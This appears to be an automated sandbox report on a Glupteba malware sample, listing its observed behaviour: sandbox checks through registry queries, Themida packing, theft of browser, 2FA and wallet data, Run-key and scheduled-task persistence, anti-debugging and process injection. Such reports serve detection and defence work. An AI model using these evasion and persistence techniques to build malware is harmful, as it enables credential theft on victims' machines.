glupteba | 1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6OUn4xmB6r0O7c3V5b7YH6lz.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6lSzGpKBNwPTtXTimMDJulCB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6lSzGpKBNwPTtXTimMDJulCB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	oknkj3dgMfP3jsqyxrBoQt3z.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	oknkj3dgMfP3jsqyxrBoQt3z.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	qSXlY8i3KwcYJEfW8ywqf8mg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	qSXlY8i3KwcYJEfW8ywqf8mg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6OUn4xmB6r0O7c3V5b7YH6lz.exe

Loads dropped DLL 12 IoCs

pid	Process
5108	ikQKjhB4k6HEzP8ctwvkUexr.tmp
5108	ikQKjhB4k6HEzP8ctwvkUexr.tmp
5476	stats.tmp
5476	stats.tmp
3920	SwCHiM1k_kk0mykkYJb5onl3.exe
5472	WerFault.exe
5472	WerFault.exe
5472	WerFault.exe
2624	Giyc9wHXHZXVayLRxBGvxuK1.exe
8544	SwCHiM1k_kk0mykkYJb5onl3.exe
8544	SwCHiM1k_kk0mykkYJb5onl3.exe
7392	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral6/files/0x000100000002b1f4-173.dat	themida
behavioral6/files/0x000100000002b1ed-171.dat	themida
behavioral6/files/0x000100000002b1ed-229.dat	themida
behavioral6/files/0x000100000002b1f4-218.dat	themida
behavioral6/memory/1436-297-0x0000000000B60000-0x0000000000B61000-memory.dmp	themida
behavioral6/memory/1412-302-0x0000000000340000-0x0000000000341000-memory.dmp	themida

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	6lSzGpKBNwPTtXTimMDJulCB.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	6lSzGpKBNwPTtXTimMDJulCB.exe
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	5083788.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 5 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6OUn4xmB6r0O7c3V5b7YH6lz.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md8_8eus.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	oknkj3dgMfP3jsqyxrBoQt3z.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	qSXlY8i3KwcYJEfW8ywqf8mg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	O0GjO4BxRBaQwuHKn8sPaAFp.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 14 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
146	ipinfo.io
362	ipinfo.io
397	api.db-ip.com
3	ipinfo.io
95	ipinfo.io
199	ipinfo.io
380	ipinfo.io
86	ipinfo.io
23	ipinfo.io
419	api.db-ip.com
1	ipinfo.io
114	ipinfo.io
568	ipinfo.io
3	ip-api.com

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
1436	6OUn4xmB6r0O7c3V5b7YH6lz.exe
1412	O0GjO4BxRBaQwuHKn8sPaAFp.exe
8044	oknkj3dgMfP3jsqyxrBoQt3z.exe
8476	qSXlY8i3KwcYJEfW8ywqf8mg.exe

Suspicious use of SetThreadContext 64 IoCs

description	pid	Process	procid_target
PID 1448 set thread context of 3180	1448	W3SGPRNzsnviCFwyWGjWU3KW.exe	125
PID 2092 set thread context of 3476	2092	6lSzGpKBNwPTtXTimMDJulCB.exe	122
PID 1936 set thread context of 692	1936	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe	139
PID 1448 set thread context of 3408	1448	W3SGPRNzsnviCFwyWGjWU3KW.exe	187
PID 1936 set thread context of 5072	1936	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe	158
PID 2092 set thread context of 5128	2092	6lSzGpKBNwPTtXTimMDJulCB.exe	149
PID 1448 set thread context of 5340	1448	W3SGPRNzsnviCFwyWGjWU3KW.exe	151
PID 1936 set thread context of 5796	1936	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe	168
PID 2092 set thread context of 6004	2092	6lSzGpKBNwPTtXTimMDJulCB.exe	170
PID 1448 set thread context of 5972	1448	W3SGPRNzsnviCFwyWGjWU3KW.exe	169
PID 1936 set thread context of 664	1936	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe	184
PID 2092 set thread context of 4200	2092	6lSzGpKBNwPTtXTimMDJulCB.exe	177
PID 1448 set thread context of 4488	1448	W3SGPRNzsnviCFwyWGjWU3KW.exe	183
PID 1936 set thread context of 6132	1936	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe	182
PID 2092 set thread context of 3972	2092	6lSzGpKBNwPTtXTimMDJulCB.exe	192
PID 1448 set thread context of 1032	1448	W3SGPRNzsnviCFwyWGjWU3KW.exe	188
PID 1936 set thread context of 1500	1936	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe	189
PID 1448 set thread context of 5716	1448	W3SGPRNzsnviCFwyWGjWU3KW.exe	195
PID 1936 set thread context of 132	1936	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe	203
PID 1936 set thread context of 232	1936	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe	210
PID 2092 set thread context of 3740	2092	6lSzGpKBNwPTtXTimMDJulCB.exe	212
PID 1448 set thread context of 5832	1448	W3SGPRNzsnviCFwyWGjWU3KW.exe	211
PID 1448 set thread context of 2096	1448	W3SGPRNzsnviCFwyWGjWU3KW.exe	216
PID 1448 set thread context of 6548	1448	W3SGPRNzsnviCFwyWGjWU3KW.exe	222
PID 2092 set thread context of 6624	2092	6lSzGpKBNwPTtXTimMDJulCB.exe	303
PID 1448 set thread context of 6284	1448	W3SGPRNzsnviCFwyWGjWU3KW.exe	233
PID 1936 set thread context of 6328	1936	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe	231
PID 2092 set thread context of 6488	2092	6lSzGpKBNwPTtXTimMDJulCB.exe	229
PID 1448 set thread context of 7048	1448	W3SGPRNzsnviCFwyWGjWU3KW.exe	236
PID 1936 set thread context of 6368	1936	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe	238
PID 2092 set thread context of 6780	2092	6lSzGpKBNwPTtXTimMDJulCB.exe	242
PID 2092 set thread context of 6712	2092	6lSzGpKBNwPTtXTimMDJulCB.exe	252
PID 1936 set thread context of 6756	1936	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe	251
PID 1896 set thread context of 7712	1896	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe	269
PID 1448 set thread context of 7380	1448	W3SGPRNzsnviCFwyWGjWU3KW.exe	272
PID 2092 set thread context of 7700	2092	6lSzGpKBNwPTtXTimMDJulCB.exe	270
PID 1936 set thread context of 7452	1936	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe	271
PID 1936 set thread context of 6044	1936	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe	268
PID 2092 set thread context of 7024	2092	6lSzGpKBNwPTtXTimMDJulCB.exe	266
PID 1936 set thread context of 7428	1936	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe	320
PID 1448 set thread context of 8580	1448	W3SGPRNzsnviCFwyWGjWU3KW.exe	286
PID 2092 set thread context of 8616	2092	6lSzGpKBNwPTtXTimMDJulCB.exe	291
PID 1936 set thread context of 6624	1936	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe	303
PID 2092 set thread context of 7628	2092	6lSzGpKBNwPTtXTimMDJulCB.exe	304
PID 1936 set thread context of 7592	1936	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe	327
PID 1448 set thread context of 8828	1448	W3SGPRNzsnviCFwyWGjWU3KW.exe	336
PID 1936 set thread context of 5224	1936	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe	332
PID 2092 set thread context of 8276	2092	6lSzGpKBNwPTtXTimMDJulCB.exe	345
PID 1936 set thread context of 1068	1936	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe	353
PID 1448 set thread context of 1408	1448	W3SGPRNzsnviCFwyWGjWU3KW.exe	349
PID 2092 set thread context of 7640	2092	6lSzGpKBNwPTtXTimMDJulCB.exe	348
PID 8196 set thread context of 6776	8196	Giyc9wHXHZXVayLRxBGvxuK1.exe	352
PID 8308 set thread context of 3852	8308	SwCHiM1k_kk0mykkYJb5onl3.exe	350
PID 8308 set thread context of 8632	8308	SwCHiM1k_kk0mykkYJb5onl3.exe	361
PID 1936 set thread context of 6668	1936	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe	360
PID 1448 set thread context of 7948	1448	W3SGPRNzsnviCFwyWGjWU3KW.exe	362
PID 8196 set thread context of 3352	8196	Giyc9wHXHZXVayLRxBGvxuK1.exe	357
PID 1936 set thread context of 1556	1936	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe	369
PID 8308 set thread context of 7060	8308	SwCHiM1k_kk0mykkYJb5onl3.exe	365
PID 1448 set thread context of 508	1448	W3SGPRNzsnviCFwyWGjWU3KW.exe	367
PID 8196 set thread context of 1120	8196	Giyc9wHXHZXVayLRxBGvxuK1.exe	370
PID 2092 set thread context of 5916	2092	6lSzGpKBNwPTtXTimMDJulCB.exe	372
PID 1936 set thread context of 3332	1936	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe	373
PID 8308 set thread context of 9940	8308	SwCHiM1k_kk0mykkYJb5onl3.exe	397

Drops file in Program Files directory 21 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	Tz4kBSsK8ii3PudsbF84i4VD.exe
File opened for modification	C:\Program Files (x86)\SmartPDF\SmartPDF\9840432e051a6fa1192594db02b80a4c1fd73456.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\SmartPDF\SmartPDF\Visit.url	Setup.exe
File opened for modification	C:\Program Files (x86)\SmartPDF\SmartPDF\Uninstall.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\inst001.exe	h80b7SZNMOiYTeLFP70GqYnl.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	ed5TJd6VV6OEfHKZtdS0STNO.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	ed5TJd6VV6OEfHKZtdS0STNO.exe
File opened for modification	C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\SmartPDF\SmartPDF\LivelyScreenRecS3.0.exe	Setup.exe
File created	C:\Program Files (x86)\SmartPDF\SmartPDF\Uninstall.ini	Setup.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	bGTFsWbTZsPGZvWis4KO3GWU.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	ed5TJd6VV6OEfHKZtdS0STNO.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	Tz4kBSsK8ii3PudsbF84i4VD.exe
File opened for modification	C:\Program Files (x86)\SmartPDF\SmartPDF\note866.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	bGTFsWbTZsPGZvWis4KO3GWU.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\inst001.exe	ed5TJd6VV6OEfHKZtdS0STNO.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cutm3.exe	ed5TJd6VV6OEfHKZtdS0STNO.exe
File opened for modification	C:\Program Files (x86)\SmartPDF\SmartPDF\PBrowFile15.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cutm3.exe	h80b7SZNMOiYTeLFP70GqYnl.exe
File opened for modification	C:\Program Files (x86)\SmartPDF\SmartPDF\9840432e051a6fa1192594db02b80a4c1fd73456.exe	Setup.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 64 IoCs

pid	pid_target	Process	procid_target
2468	1344	WerFault.exe	101
2412	2464	WerFault.exe	81
4064	1868	WerFault.exe	92
4132	1636	WerFault.exe	95
864	2476	WerFault.exe	82
5500	1684	WerFault.exe	94
3528	3920	WerFault.exe	209
6260	5176	WerFault.exe	180
6208	6624	WerFault.exe	223
8264	2624	WerFault.exe	277
8244	2624	WerFault.exe	277
7536	1876	WerFault.exe	186
2472	8316	WerFault.exe	285
7088	1876	WerFault.exe	186
3056	1896	WerFault.exe	324
8256	7960	WerFault.exe	315
5364	4852	WerFault.exe	172
8264	4852	WerFault.exe	172
10172	8656	WerFault.exe	290
9948	5292	WerFault.exe	312
8356	7392	WerFault.exe	461
9840	1896	WerFault.exe	467
5944	7564	WerFault.exe	454
10232	7164	WerFault.exe	237
7568	6184	WerFault.exe	234
9776	7436	WerFault.exe	262
8864	7956	WerFault.exe	281
8904	1940	WerFault.exe	564
7652	9780	WerFault.exe	565
5324	9500	WerFault.exe	378
4612	4988	WerFault.exe	364
8516	9912	WerFault.exe	392
9276	10340	WerFault.exe	498
6452	3000	WerFault.exe	656
7224	5700	WerFault.exe	657
3732	10772	WerFault.exe	501
10644	6640	WerFault.exe	709
10508	8612	WerFault.exe	720
1588	6404	WerFault.exe	800
7352	7604	WerFault.exe	803
12648	11672	WerFault.exe	873
7412	1616	WerFault.exe	907
13292	6928	WerFault.exe	917
12572	9492	WerFault.exe	981
12424	13116	WerFault.exe	1019
1572	11760	WerFault.exe	1046
8628	6876	WerFault.exe	1054
9548	11108	WerFault.exe	1076
14468	11916	WerFault.exe	1112
13936	11764	Process not Found	1160
8876	13008	Process not Found	1209
7864	15264	Process not Found	1289
9628	15204	Process not Found	1317
18320	7468	Process not Found	1353
14036	20132	Process not Found	1426
21112	20252	Process not Found	1467
21880	23020	Process not Found	1488
28188	16336	Process not Found	1536
26180	1488	Process not Found	1560
30292	28852	Process not Found	1580
29964	29808	Process not Found	1590
23812	30756	Process not Found	1639
16132	32776	Process not Found	1693
35104	440	Process not Found	6

Checks processor information in registry 2 TTPs 64 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	Process not Found
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	schtasks.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	W3SGPRNzsnviCFwyWGjWU3KW.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	6lSzGpKBNwPTtXTimMDJulCB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	6lSzGpKBNwPTtXTimMDJulCB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	W3SGPRNzsnviCFwyWGjWU3KW.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	W3SGPRNzsnviCFwyWGjWU3KW.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	W3SGPRNzsnviCFwyWGjWU3KW.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	7glI7txA9mjGcEeaSo4MST6J.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	schtasks.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	6lSzGpKBNwPTtXTimMDJulCB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	W3SGPRNzsnviCFwyWGjWU3KW.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	schtasks.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	W3SGPRNzsnviCFwyWGjWU3KW.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Process not Found
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	6lSzGpKBNwPTtXTimMDJulCB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	W3SGPRNzsnviCFwyWGjWU3KW.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Process not Found
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	schtasks.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	6lSzGpKBNwPTtXTimMDJulCB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	7glI7txA9mjGcEeaSo4MST6J.exe

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
3376	schtasks.exe
9288	schtasks.exe
864	schtasks.exe
4520	schtasks.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
1188	timeout.exe
8820	timeout.exe
7444	timeout.exe

Enumerates system info in registry 2 TTPs 39 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	6lSzGpKBNwPTtXTimMDJulCB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	W3SGPRNzsnviCFwyWGjWU3KW.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	W3SGPRNzsnviCFwyWGjWU3KW.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	W3SGPRNzsnviCFwyWGjWU3KW.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	Process not Found
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	Process not Found
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	schtasks.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Process not Found
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Process not Found
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	6lSzGpKBNwPTtXTimMDJulCB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	schtasks.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	6lSzGpKBNwPTtXTimMDJulCB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	W3SGPRNzsnviCFwyWGjWU3KW.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
